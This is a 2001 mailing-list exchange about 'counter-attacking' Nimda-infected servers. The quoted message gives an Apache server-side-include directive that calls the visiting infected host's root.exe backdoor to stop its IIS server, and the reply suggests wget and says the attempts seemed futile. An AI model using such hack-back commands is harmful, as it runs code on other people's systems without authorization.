[NTLUG:Discuss] nimba counter attack without PHP?
Jack Snodgrass
idiotboy at cybermail.net
Wed Sep 19 20:24:43 CDT 2001
You have to use wget. The syntax is something like
wget -o /dev/null -O - http://url.....
lynx wants a termilal that apache doesn't provide. I think that
if you have cgi debuging on, the logs will show you some 'no terminal'
type messages. I tried several diferent things with lynx and ended
up giving up on it.
At least that's what I figured out in my testing.
I also decided ( right or wrongly ) that a lot of these
servers that have been compromised won't let you just shut
them down with the shutdown commands that have been posted.
The 'guest' id that runs the web server doesn't have this
ability. Plus.... if you try and manually get back to one of
these servers, 75% ( or more ) of the time, it's too busy
doing other crap to answer a http:// request. Try it your self
manually and see what happens.
I decided that I was just wasting my time trying to do anything
usefull.
jack
----- Original Message -----
From: "Richard Geoffrion" <richard at rain.lewisville.tx.us>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:53 PM
Subject: Re: [NTLUG:Discuss] nimba counter attack without PHP?
> so then adding
>
> AddType text/html .ida
> AddHandler server-parsed .ida
>
> to the httpd.conf file...and including
>
> <!--#exec cmd="lynx -source
> http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
>
> is all I can do?
>
> you know...How do I verify that it is working...because I continue to see
> hits to the default.ida file on my webserver that come from the same IP
> address. for example
>
> <log snip mode=truncated>
> 64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?
> 64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?
> </log snip>
>
> So what...did the server reset and 15 minutes later decide to hit me
again?
>
> oh what I wouldn't give for an infected Microsoft server so that I could
do
> some tests. UG.
>
> _______________________________________________
> http://www.ntlug.org/mailman/listinfo/discuss
>
More information about the Discuss
mailing list